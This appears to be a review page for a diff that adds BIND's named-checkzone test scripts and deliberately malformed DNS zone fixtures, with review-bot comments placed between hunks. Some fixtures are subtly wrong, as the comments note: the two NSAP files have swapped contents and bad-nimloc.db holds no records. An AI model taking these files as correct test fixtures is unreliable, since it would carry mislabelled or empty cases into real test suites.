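Review bot: The last case in checknames/tests.sh reuses the label `check that updates to 'check-names master ignore;' succeed and are not logged`, which an earlier case already carries. What it actually does is wait for `xxx_xxx.primary-ignore.update` on 10.53.0.5, where that zone is `type secondary` and the governing option in ns5 is `check-names slave ignore;`. A failure log would therefore point at the wrong server role; the label should read `echo_i "check that updates to 'check-names slave ignore;' succeed and are not logged ($n)"`. The `'check-names ignore;'` zone-load case also runs `grep` without `> /dev/null`, unlike every other case, so a hit prints the log line into the test output. The counters alternate between `expr` and `$((...))`; one form throughout would be easier to read.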
diff --git a/bin/tests/system/checkzone/clean.sh b/bin/tests/system/checkzone/clean.sh new file mode 100644 index 0000000..a02fc64 --- /dev/null +++ b/bin/tests/system/checkzone/clean.sh @@ -0,0 +1,16 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f test.* good1.db.map good1.db.raw named-compilezone +rm -f ns*/named.lock +rm -f zones/bad-tsig.db diff --git a/bin/tests/system/checkzone/setup.sh b/bin/tests/system/checkzone/setup.sh new file mode 100644 index 0000000..f8b464a --- /dev/null +++ b/bin/tests/system/checkzone/setup.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +ln -s $CHECKZONE named-compilezone + +./named-compilezone -D -F raw -o good1.db.raw example \ + zones/good1.db > /dev/null 2>&1 +./named-compilezone -D -F map -o good1.db.map example \ + zones/good1.db > /dev/null 2>&1 + +copy_setports zones/bad-tsig.db.in zones/bad-tsig.db diff --git a/bin/tests/system/checkzone/tests.sh b/bin/tests/system/checkzone/tests.sh new file mode 100644 index 0000000..0b0e822 --- /dev/null +++ b/bin/tests/system/checkzone/tests.sh 
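Review bot: In checkzone/setup.sh, `ln -s $CHECKZONE named-compilezone` fails if the link survives from an interrupted earlier run. Unlike checknames/setup.sh, this script does not run `$SHELL clean.sh` first. Both `./named-compilezone` invocations send output to `/dev/null` and ignore the exit status. Unless conf.sh enables `set -e` (not visible here), a failed link or compile would surface only later, as a missing `good1.db.raw` or `good1.db.map` in tests.sh. Consider adding `$SHELL clean.sh` before the link, using `ln -sf "$CHECKZONE" named-compilezone`, and appending `|| exit 1` to each compile command.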
@@ -0,0 +1,200 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=1 + +for db in zones/good*.db +do + echo_i "checking $db ($n)" + ret=0 + case $db in + zones/good-gc-msdcs.db|zones/good-spf-exception.db) + $CHECKZONE -k fail -i local example $db > test.out.$n 2>&1 || ret=1 + ;; + zones/good-dns-sd-reverse.db) + $CHECKZONE -k fail -i local 0.0.0.0.in-addr.arpa $db > test.out.$n 2>&1 || ret=1 + ;; + *) + $CHECKZONE -i local example $db > test.out.$n 2>&1 || ret=1 + ;; + esac + n=$((n+1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +done + +for db in zones/bad*.db +do + echo_i "checking $db ($n)" + ret=0 v=0 + case $db in + zones/bad-dns-sd-reverse.db|zones/bad-svcb-servername.db) + $CHECKZONE -k fail -i local 0.0.0.0.in-addr.arpa $db > test.out.$n 2>&1 || v=$? + ;; + *) + $CHECKZONE -i local example $db > test.out.$n 2>&1 || v=$? 
+ ;; + esac + test $v = 1 || ret=1 + n=$((n+1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +done + +echo_i "checking with journal file ($n)" +ret=0 +$CHECKZONE -D -o test.orig.db test zones/test1.db > /dev/null 2>&1 || ret=1 +$CHECKZONE -D -o test.changed.db test zones/test2.db > /dev/null 2>&1 || ret=1 +$MAKEJOURNAL test test.orig.db test.changed.db test.orig.db.jnl 2>&1 || ret=1 +jlines=$($JOURNALPRINT test.orig.db.jnl | wc -l) +[ $jlines = 3 ] || ret=1 +$CHECKZONE -D -j -o test.out1.db test test.orig.db > /dev/null 2>&1 || ret=1 +cmp -s test.changed.db test.out1.db || ret=1 +mv -f test.orig.db.jnl test.journal +$CHECKZONE -D -J test.journal -o test.out2.db test test.orig.db > /dev/null 2>&1 || ret=1 +cmp -s test.changed.db test.out2.db || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking with spf warnings ($n)" +ret=0 +$CHECKZONE example zones/spf.db > test.out1.$n 2>&1 || ret=1 +$CHECKZONE -T ignore example zones/spf.db > test.out2.$n 2>&1 || ret=1 +grep "'x.example' found type SPF" test.out1.$n > /dev/null && ret=1 +grep "'y.example' found type SPF" test.out1.$n > /dev/null || ret=1 +grep "'example' found type SPF" test.out1.$n > /dev/null && ret=1 +grep "'x.example' found type SPF" test.out2.$n > /dev/null && ret=1 +grep "'y.example' found type SPF" test.out2.$n > /dev/null && ret=1 +grep "'example' found type SPF" test.out2.$n > /dev/null && ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking with max ttl (text) ($n)" +ret=0 +$CHECKZONE -l 300 example zones/good1.db > test.out1.$n 2>&1 && ret=1 +$CHECKZONE -l 600 example zones/good1.db > test.out2.$n 2>&1 || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking with max ttl (raw) ($n)" +ret=0 +$CHECKZONE -f raw -l 300 example good1.db.raw > test.out1.$n 2>&1 && ret=1 +$CHECKZONE -f raw -l 600 example good1.db.raw > 
test.out2.$n 2>&1 || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking with max ttl (map) ($n)" +ret=0 +$CHECKZONE -f map -l 300 example good1.db.map > test.out1.$n 2>&1 && ret=1 +$CHECKZONE -f map -l 600 example good1.db.map > test.out2.$n 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking for no 'inherited owner' warning on '\$INCLUDE file' with no new \$ORIGIN ($n)" +ret=0 +$CHECKZONE example zones/nowarn.inherited.owner.db > test.out1.$n 2>&1 || ret=1 +grep "inherited.owner" test.out1.$n > /dev/null && ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking for 'inherited owner' warning on '\$ORIGIN + \$INCLUDE file' ($n)" +ret=0 +$CHECKZONE example zones/warn.inherit.origin.db > test.out1.$n 2>&1 || ret=1 +grep "inherited.owner" test.out1.$n > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking for 'inherited owner' warning on '\$INCLUDE file origin' ($n)" +ret=0 +$CHECKZONE example zones/warn.inherited.owner.db > test.out1.$n 2>&1 || ret=1 +grep "inherited.owner" test.out1.$n > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking that raw zone with bad class is handled ($n)" +ret=0 +$CHECKZONE -f raw example zones/bad-badclass.raw > test.out.$n 2>&1 && ret=1 +grep "failed: bad class" test.out.$n >/dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking that expirations that loop using serial arithmetic are handled ($n)" +ret=0 +q=-q +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || 
$CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +test $ret -eq 1 || $CHECKZONE $q dyn.example.net zones/crashzone.db || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking that nameserver below DNAME is reported even with occulted address record present ($n)" +ret=0 +$CHECKZONE example.com zones/ns-address-below-dname.db > test.out.$n 2>&1 && ret=1 +grep "is below a DNAME" test.out.$n >/dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking that delegating nameserver below DNAME is reported even with occulted address record present ($n)" 
+ret=0 +$CHECKZONE example.com zones/delegating-ns-address-below-dname.db > test.out.$n 2>&1 || ret=1 +grep "is below a DNAME" test.out.$n >/dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +ret=0 +echo_i "checking integer overflow is prevented in \$GENERATE ($n)" +$CHECKZONE -D example.com zones/generate-overflow.db > test.out.$n 2>&1 || ret=1 +lines=$(grep -c CNAME test.out.$n) +echo $lines +[ "$lines" -eq 1 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/checkzone/zones/.gitattributes b/bin/tests/system/checkzone/zones/.gitattributes new file mode 100644 index 0000000..a1b3cec --- /dev/null +++ b/bin/tests/system/checkzone/zones/.gitattributes @@ -0,0 +1 @@ +*.raw -text diff --git a/bin/tests/system/checkzone/zones/bad-badclass.raw b/bin/tests/system/checkzone/zones/bad-badclass.raw Binary files differnew file mode 100644 index 0000000..d8f1bf7 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-badclass.raw diff --git a/bin/tests/system/checkzone/zones/bad-caa-rr.db b/bin/tests/system/checkzone/zones/bad-caa-rr.db Binary files differnew file mode 100644 index 0000000..fb7b861 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-caa-rr.db diff --git a/bin/tests/system/checkzone/zones/bad-cdnskey.db b/bin/tests/system/checkzone/zones/bad-cdnskey.db new file mode 100644 index 0000000..d109423 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-cdnskey.db 
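Review bot: In bin/tests/system/checkzone/tests.sh the expected-failure checks written as `$CHECKZONE ... && ret=1` (the `-l 300` max-ttl cases for text, raw and map, the bad-class case and the ns-address-below-dname case) accept any non-zero exit, so an abort or a signal in the zone parser is counted as a correct rejection. The `zones/bad*.db` loop already guards against this with `|| v=$?` followed by `test $v = 1 || ret=1`; the same pattern fits here, e.g. `v=0; $CHECKZONE -l 300 example zones/good1.db > test.out1.$n 2>&1 || v=$?` and then `test $v = 1 || ret=1`. The bad-class and DNAME cases are partly covered by their greps on the output, but the three max-ttl cases have no such second check. Separately, the final $GENERATE overflow test runs `n=$((n+1))` before the test although the preceding test already incremented n, which leaves a gap in the test.out.N numbering.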
@@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +example. 0 SOA . . 0 0 0 0 0 +example. 0 NS . +example. 0 DNSKEY 257 3 10 AwEAAbqjg7xdvnU2Q/gtLw5LOfr5cDeTRjYuEbkzGrUiVSOSoxcTxuao WS/AFPQHuD8OSLiE/CeZ087JowREXl058rRfae8KMrveY17V0wmKs9N1 F1wf/hRDpXiThlRHWlskp8eSEEIqYrrHgWTesy/xDGIEOFM1gwRo0w8j KdRRJeL2hseTMa+m3rTzrYudUsI0BHLW8PiDUCbG5xgdee8/5YR4847i AAqHIiPJ1Z/IT53OIjMmtv5BUykZ8RYjlJxxX+C+dpRKiK73SQaR3hCB XAYOL9WsDp2/fpmEZpewavkMkdC+j2CX+z27MCS3ASO0AeKK0lcNXwND kgreE+Kr7gc= +example. 0 CDNSKEY 257 3 14 AwEAAbqjg7xdvnU2Q/gtLw5LOfr5cDeTRjYuEbkzGrUiVSOSoxcTXXXX WS/AFPQHuD8OSLiE/CeZ087JowREXl058rRfae8KMrveY17V0wmKs9N1 F1wf/hRDpXiThlRHWlskp8eSEEIqYrrHgWTesy/xDGIEOFM1gwRo0w8j KdRRJeL2hseTMa+m3rTzrYudUsI0BHLW8PiDUCbG5xgdee8/5YR4847i AAqHIiPJ1Z/IT53OIjMmtv5BUykZ8RYjlJxxX+C+dpRKiK73SQaR3hCB XAYOL9WsDp2/fpmEZpewavkMkdC+j2CX+z27MCS3ASO0AeKK0lcNXwND kgreE+Kr7gc= diff --git a/bin/tests/system/checkzone/zones/bad-cds.db b/bin/tests/system/checkzone/zones/bad-cds.db new file mode 100644 index 0000000..2ce4a0d --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-cds.db 
@@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +example. 0 SOA . . 0 0 0 0 0 +example. 0 NS . +example. 0 DNSKEY 257 3 10 AwEAAbqjg7xdvnU2Q/gtLw5LOfr5cDeTRjYuEbkzGrUiVSOSoxcTxuao WS/AFPQHuD8OSLiE/CeZ087JowREXl058rRfae8KMrveY17V0wmKs9N1 F1wf/hRDpXiThlRHWlskp8eSEEIqYrrHgWTesy/xDGIEOFM1gwRo0w8j KdRRJeL2hseTMa+m3rTzrYudUsI0BHLW8PiDUCbG5xgdee8/5YR4847i AAqHIiPJ1Z/IT53OIjMmtv5BUykZ8RYjlJxxX+C+dpRKiK73SQaR3hCB XAYOL9WsDp2/fpmEZpewavkMkdC+j2CX+z27MCS3ASO0AeKK0lcNXwND kgreE+Kr7gc= +example. 0 CDS 14364 14 2 FD03B2312C8F0FE72C1751EFA1007D743C94EC91594FF0047C23C37CE119BA0B diff --git a/bin/tests/system/checkzone/zones/bad-dhcid.db b/bin/tests/system/checkzone/zones/bad-dhcid.db new file mode 100644 index 0000000..df36eb7 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-dhcid.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 DHCID +@ 3600 DHCID diff --git a/bin/tests/system/checkzone/zones/bad-dns-sd-reverse.db b/bin/tests/system/checkzone/zones/bad-dns-sd-reverse.db new file mode 100644 index 0000000..c766c8f --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-dns-sd-reverse.db 
@@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA . . 0 0 0 0 0 +@ IN NS . +; +; The following are *not* Service Discovery Prefixes from RFC 6763 and the +; PTR check-names rules for IN-ADDR.ARPA and IP6.ARPA do still apply. +; +b._fail._udp IN PTR !@#3. +db._wrong._udp IN PTR !@#3. +lb._dns-sd._tcp IN PTR !@#3. diff --git a/bin/tests/system/checkzone/zones/bad-ds.db b/bin/tests/system/checkzone/zones/bad-ds.db new file mode 100644 index 0000000..9363cb0 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-ds.db @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +example. 0 SOA . . 0 0 0 0 0 +example. 0 NS . +example. 0 DNSKEY 257 3 10 AwEAAbqjg7xdvnU2Q/gtLw5LOfr5cDeTRjYuEbkzGrUiVSOSoxcTxuao WS/AFPQHuD8OSLiE/CeZ087JowREXl058rRfae8KMrveY17V0wmKs9N1 F1wf/hRDpXiThlRHWlskp8eSEEIqYrrHgWTesy/xDGIEOFM1gwRo0w8j KdRRJeL2hseTMa+m3rTzrYudUsI0BHLW8PiDUCbG5xgdee8/5YR4847i AAqHIiPJ1Z/IT53OIjMmtv5BUykZ8RYjlJxxX+C+dpRKiK73SQaR3hCB XAYOL9WsDp2/fpmEZpewavkMkdC+j2CX+z27MCS3ASO0AeKK0lcNXwND kgreE+Kr7gc= +example. 0 DS 14364 10 2 FD03B2312C8F0FE72C1751EFA1007D743C94EC91594FF0047C23C37CE119BA0C 
diff --git a/bin/tests/system/checkzone/zones/bad-eid.db b/bin/tests/system/checkzone/zones/bad-eid.db
new file mode 100644
index 0000000..ba568ef
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/bad-eid.db
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ EID
+@ EID
diff --git a/bin/tests/system/checkzone/zones/bad-generate-garbage.db b/bin/tests/system/checkzone/zones/bad-generate-garbage.db
new file mode 100644
index 0000000..0d66e75
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/bad-generate-garbage.db
@@ -0,0 +1,17 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ SOA ns hostmaster 2011012708 3600 1200 604800 1200
+ NS ns
+ns A 192.0.2.1
+
+$GENERATE 0-7 host$ A 1.2.3.${1,0,dgarbagegarbage}
diff --git a/bin/tests/system/checkzone/zones/bad-generate-missing-brace.db b/bin/tests/system/checkzone/zones/bad-generate-missing-brace.db
new file mode 100644
index 0000000..314583e
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/bad-generate-missing-brace.db
@@ -0,0 +1,17 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ SOA ns hostmaster 2011012708 3600 1200 604800 1200
+ NS ns
+ns A 192.0.2.1
+
+$GENERATE 0-7 host$ A 1.2.3.${1000
diff --git a/bin/tests/system/checkzone/zones/bad-generate-range.db b/bin/tests/system/checkzone/zones/bad-generate-range.db
new file mode 100644
index 0000000..62a9e15
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/bad-generate-range.db
@@ -0,0 +1,18 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ SOA ns hostmaster 2011012708 3600 1200 604800 1200
+ NS ns
+ns A 192.0.2.1
+
+; 2147483647 + 1 overflows what can be represented in an 'int'
+$GENERATE 1-1 host$ TXT foo${2147483647}
diff --git a/bin/tests/system/checkzone/zones/bad-generate-tkey.db b/bin/tests/system/checkzone/zones/bad-generate-tkey.db
new file mode 100644
index 0000000..8c05e51
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/bad-generate-tkey.db
@@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +$GENERATE 0-7 tkey$ TKEY "invalid.algorithm. 1516055980 1516140801 1 0 16 gRof8D2BFKvl/vrr9Lmnjw== 16 gRof8D2BFKvl/vrr9Lmnjw==" diff --git a/bin/tests/system/checkzone/zones/bad-nimloc.db b/bin/tests/system/checkzone/zones/bad-nimloc.db new file mode 100644 index 0000000..56d04c6 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-nimloc.db @@ -0,0 +1,10 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership.
\ No newline at end of file diff --git a/bin/tests/system/checkzone/zones/bad-nsap-empty.db b/bin/tests/system/checkzone/zones/bad-nsap-empty.db new file mode 100644 index 0000000..fb8fdd0 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-nsap-empty.db @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +; NSAP with an odd number of hex digits +example NSAP 0x47000580005a0000000001e133ffffff000161000 diff --git a/bin/tests/system/checkzone/zones/bad-nsap-odd-nibble.db b/bin/tests/system/checkzone/zones/bad-nsap-odd-nibble.db new file mode 100644 index 0000000..d287648 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-nsap-odd-nibble.db @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +; empty NSAP address +example NSAP 0x diff --git a/bin/tests/system/checkzone/zones/bad-nsec3-padded.db b/bin/tests/system/checkzone/zones/bad-nsec3-padded.db new file mode 100644 index 0000000..8212bc4 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-nsec3-padded.db 
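Review bot: bad-nimloc.db as added here holds only the licence comment block and no records (the hunk is 10 lines and ends without a newline), so whatever makes named-checkzone reject it is unrelated to NIMLOC parsing — presumably the missing SOA, though that is not visible on this page. The sibling bad-eid.db fixture carries two `@ EID` lines; if the intent is the same for NIMLOC, the file should end with `@ NIMLOC` twice, mirroring that fixture. As it stands the `zones/bad*.db` loop in tests.sh passes on this file without exercising the record type its name promises.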
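Review bot: The contents of bad-nsap-empty.db and bad-nsap-odd-nibble.db look swapped: bad-nsap-empty.db carries the comment `; NSAP with an odd number of hex digits` and a long hex address, while bad-nsap-odd-nibble.db carries `; empty NSAP address` and `example NSAP 0x`. Both files are still picked up by the `zones/bad*.db` loop in tests.sh, so coverage is unchanged, but a failure report naming one file will point the reader at the wrong case. Swapping the two comment-and-record pairs, or the two file names, fixes it.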
@@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +; The following NSEC3 RR is invalid as the Next Hashed Owner Name field +; is padded. See RFC 5155. +0p9mhaveqvm6t7vbl5lop2u3t2rp3tom NSEC3 1 1 12 aabbccdd ( + CPNMU=== MX DNSKEY NS + SOA NSEC3PARAM RRSIG ) diff --git a/bin/tests/system/checkzone/zones/bad-nsec3owner-padded.db b/bin/tests/system/checkzone/zones/bad-nsec3owner-padded.db new file mode 100644 index 0000000..bf3c5ab --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-nsec3owner-padded.db @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +; The following NSEC3 RR owner is invalid as the owner name is padded. +CPNMU=== NSEC3 2 1 12 aabbccdd ( CPNMU MX DNSKEY NS + SOA NSEC3PARAM RRSIG ) diff --git a/bin/tests/system/checkzone/zones/bad-svcb-mandatory.db b/bin/tests/system/checkzone/zones/bad-svcb-mandatory.db new file mode 100644 index 0000000..368f0ca --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-svcb-mandatory.db 
